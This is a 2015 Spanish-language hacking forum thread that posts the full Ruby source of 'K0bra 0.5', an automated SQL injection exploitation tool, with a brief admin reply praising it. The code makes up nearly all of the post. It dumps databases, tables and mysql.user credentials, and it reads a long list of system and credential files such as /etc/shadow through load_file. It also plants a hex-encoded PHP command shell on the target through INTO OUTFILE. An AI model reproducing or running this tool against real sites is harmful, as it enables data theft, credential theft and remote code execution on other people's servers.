This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

[Ruby] K0bra 0.5

  • 1 Replies
  • 4742 Views

0 Members and 1 Guest are viewing this topic.

Offline BigBear

  • *
  • Underc0der
  • Posts: 541
  • Actividad:
    0%
  • Reputación 3
    • View Profile

[Ruby] K0bra 0.5

  • on: July 24, 2015, 01:12:31 pm
Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados


El codigo :

Code: (ruby) You are not allowed to view links. Register or Login
#!usr/bin/ruby
#K0bra 0.5
#(C) Doddy Hackman 2015

require "net/http"
require "open-uri"

$files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

def decode_hex(text)
  text = text.sub("0x","")
  return [text].pack('H*')[0]
end

def encode_hex(text)
  return "0x"+text.unpack('H*')[0]
end

def copyright()
  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  gets.chomp
  exit(1)
end

def installer()
  dir = Dir::pwd+"/"+"logs_webs"
  if not FileTest::directory?(dir)
    Dir::mkdir(dir)
  end
end

def savefile(file,text)
  url = URI.parse(file)
  save = File.open("logs_webs/"+url.host+".txt","a")
  save.puts text+"\n"
  save.close
end

def bypass(op)
  if op=="--"
    return "+","--"
  elsif op=="/*"
   return "/**/","/**/"
  elsif op=="%20"
   return "%20","%00"
  else
   return "+","--"   
  end
end

def head()
  clean()
  print "
 
 @      @@   @             
@@     @  @ @@             
 @ @@  @  @  @ @   @ @ @@@
 @ @   @  @  @@ @ @@@ @  @
 @@    @  @  @  @  @   @@@
 @ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@

"
end

def volverinicio()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  inicio()
end

def clean()
  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
    system("cls")
  else
    system("clear")
  end
end

def retorno(url,by)
  print "\n[+] Finished"
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  central(url,by)
end

def gettables(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] Tables Found : #{total}\n")
    for num in ("17"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumns(url,by,tablex)
  tablexa = encode_hex(tablex)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] Table : #{tablex}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getdbs(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  print "\n[+] Getting DBS ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] DBS Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] DB Found : "+table+"\n"
        savefile(url,"[+] DB Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def gettablesbydb(url,by,dbx)
  data  = encode_hex(dbx)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS : #{dbx}")
    savefile(url,"[+] Tables Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumnsbydb(url,by,db,tab)
  data = encode_hex(db)
  tabx = encode_hex(tab)
 
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] DB : #{db}")
    savefile(url,"[+] Table : #{tab}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def mysqluser(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
   print "\n[+] Searching mysql.user\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Users Mysql Found : ",total,"\n\n"
    savefile(url,"[+] Users Mysql Found : "+total+"\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
        host,user,passw = $1,$2,$3
        print "[Host] : "+host
        print " [User] : "+user
        print " [Pass] : "+passw+"\n"   
        savefile(url,"[Host] : "+host)
        savefile(url,"[User] : "+user)
        savefile(url,"[Pass] : "+passw+"\n")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def details(url,by)
  pass1,pass2 = bypass(by)
  hextest = "0x2f6574632f706173737764" #/etc/passwd
  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  web1 = url.sub(/hackman/,"0x4b30425241")
  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
   print "\n[+] Extrating information of the DB\n"
  code1 = toma(web2)
  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user,data,ver = $1,$2,$3
    print "\n[+] Username : "+user
    print "\n[+] Database : "+data
    print "\n[+] Version : "+ver+"\n\n"
    savefile(url,"\n[+] Username : "+user)
    savefile(url,"[+] Database : "+data)
    savefile(url,"[+] Version : "+ver+"\n")
  else
    print "[-] Not Found\n"
  end
   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
   code4 = toma(web3)
   if code2=~/K0BRA/
     print "[+] Mysql User : ON\n"
     savefile(url,"[+] Mysqluser : ON")
   end
   if code3=~/K0BRA/
     print "[+] information_schema : ON\n"
     savefile(url,"[+] information_schema : ON")
   end
   if code4=~/ERTOR854/
     print "[+] load_file : ON\n"
     savefile(url,"[+] load_file : ON")
   end   
   savefile(url,"") #espacio en blanco
 end
 
 def dumper(url,by,table,col1,col2)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  print "\n[+] Getting Values ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    savefile(url,"\n[+] Table : "+table)
    savefile(url,"[+] Column 1 : "+col1)
    savefile(url,"[+] Column 2 : "+col2)
    print "[+] Values Found : ",total,"\n"
    savefile(url,"\n[+] Values Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
        uno,dos = $1,$2
        print "\n[+] "+col1+" : "+uno+"\n"
        print "[+] "+col2+" : "+dos+"\n"
        savefile(url,"\n[+] "+col1+" : "+uno)
        savefile(url,"[+] "+col2+" : "+dos)
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def fuzzfile(url,by)
  pass1,pass2 = bypass(by)
  print "\n[+] Fuzzing Files with load_file ....\n"
  $files.each do |file|
    res = file
    file = file.chomp
    file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]")
    end   
  end
  print "\n"
end

def abrirfile(url,by,file)
  pass1,pass2 = bypass(by)
  print "\n[+] Opening file ....\n"
  res = file
  file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]\n"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]\n")
    else
      print "\n\n[-] Error\n\n"
    end
       
end

def into(url,by,full,dir)
  pass1,pass2 = bypass(by)
  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  lugar = full+"/cmd.php"
  lugardos = dir+"/cmd.php"
  h = URI.parse(url)
  webtest = "http://"+h.host+lugardos
  web1 = url.sub(/hackman/,linea)
  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  toma(formandoweb)
  code = toma(webtest)
  if code=~/Mini Shell By Doddy/
    print "\n[Shell Up] : "+webtest+"\n"
    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  else
    print "\n\n[-] Error\n"
  end
end

def central(url,by)
  clean()
  head()
  print "\n\n[+] Page : #{url}\n"
  print "[+] ByPass : #{by}\n\n"

  print "\n[information_schema]\n\n"
  print "1 - Show tables\n"
  print "2 - Show columns of the a table\n"
  print "3 - Show databases\n"
  print "4 - Show tables from the a DB\n"
  print "5 - Show columns from the a table of the DB\n"
  print "\n[mysql.user]\n\n"
  print "6 - Show users\n"
  print "\n[Others]\n\n"
  print "7 - Show details\n"
  print "8 - Dump data\n"
  print "9 - Fuzz Files with load_file\n"
  print "10 - Load files with load_file\n"
  print "11 - Create Shell\n"
  print "12 - Show log\n"
  print "13 - Change target\n"
  print "14 - Exit\n\n\n"
 
  print "[+] Option : "
  op = gets.chomp
  print "\n"
   
  if op == "1"
    gettables(url,by)
    retorno(url,by)
  elsif op == "2"
    print "\n[+] Table : "
    table = gets.chomp
    getcolumns(url,by,table)
    retorno(url,by)
  elsif op == "3"
    getdbs(url,by)
    retorno(url,by)
  elsif op == "4"
    print "\n[+] DB : "
    db = gets.chomp
    gettablesbydb(url,by,db)
    retorno(url,by)
  elsif op == "5"
    print "\n[+] DB : "
    db = gets.chomp
    print "\n[+] Table : "
    tab = gets.chomp
    getcolumnsbydb(url,by,db,tab)
    retorno(url,by)
  elsif op == "6"
    mysqluser(url,by)
    retorno(url,by)
  elsif op == "7"
    details(url,by)
    retorno(url,by)
  elsif op == "8"
    print "\n[+] Table : "
    table = gets.chomp
    print "\n[+] Column 1 : "
    col1 = gets.chomp
    print "\n[+] Column 2 : "
    col2 = gets.chomp
    dumper(url,by,table,col1,col2)
    retorno(url,by)
  elsif op == "9"
    fuzzfile(url,by)
    retorno(url,by)
  elsif op == "10"
    print "\n[+] File : "
    file = gets.chomp
    abrirfile(url,by,file)
    retorno(url,by)
  elsif op == "11"
    print "\n[Full Source Discloure] : "
    full = gets.chomp
    print "\n[Directory to test] : "
    dir = gets.chomp
    into(url,by,full,dir)
    retorno(url,by)
  elsif op == "12"
    urla = URI.parse(url)
    ar = "logs_webs/"+urla.host+".txt"
    system("start #{ar}")
    retorno(url,by)
  elsif op == "13"
    inicio()
  elsif op == "14"
    copyright()
  else
    retorno(url,by)
  end
end

def findlength(url,by)
  pass1,pass2 = bypass(by)
  z = "1"
  print "\n[+] Finding columns lenght ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z+","+num
    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    if code=~/K0BRA(.*?)K0BRA/
      print "[+] The Page has "+num+" columns\n"
      print "[+] The number "+$1+" print data"
      z = z.sub($1,"hackman")
      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
      savefile(url,"[+] SQLI : "+sqli)
      savefile(url,"[+] Bypass : "+by+"\n")
      central(sqli,by)
    end
  end
  print "[-] Columns lenght not found\n"
  volverinicio()
end

def testvul(page,by)
  pass1,pass2 = bypass(by)
  print "\n\n[+] Testing vulnerability ...\n\n"
  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  if codeuno != codedos
    print "[+] Vulnerable !\n"
    findlength(page,by)
  else
    print "[-] Not vulnerable\n"
    print "\n[+] Scan anyway y/n : "
    op = gets.chomp
    if op == "y"
      findlength(page,by)
    else
      volverinicio()
  end
 end 
end
 
def inicio()
  clean()
  head()
  print "\n\n[+] Page : "
  page = gets.chomp
  print "\n[+] Bypass : "
  by = gets.chomp
  if page=~/hackman/
    central(page,by)
  else
    testvul(page,by)
  end
end

installer()
inicio()

# The End ?

Eso es todo.

Offline blackdrake

  • *
  • Co Admin
  • Posts: 2013
  • Actividad:
    20%
  • Country: es
  • Reputación 23
    • View Profile

Re:[Ruby] K0bra 0.5

  • on: July 26, 2015, 07:15:11 am
Que genial aporte, muy buena @You are not allowed to view links. Register or Login, luego la pruebo :D

Saludos.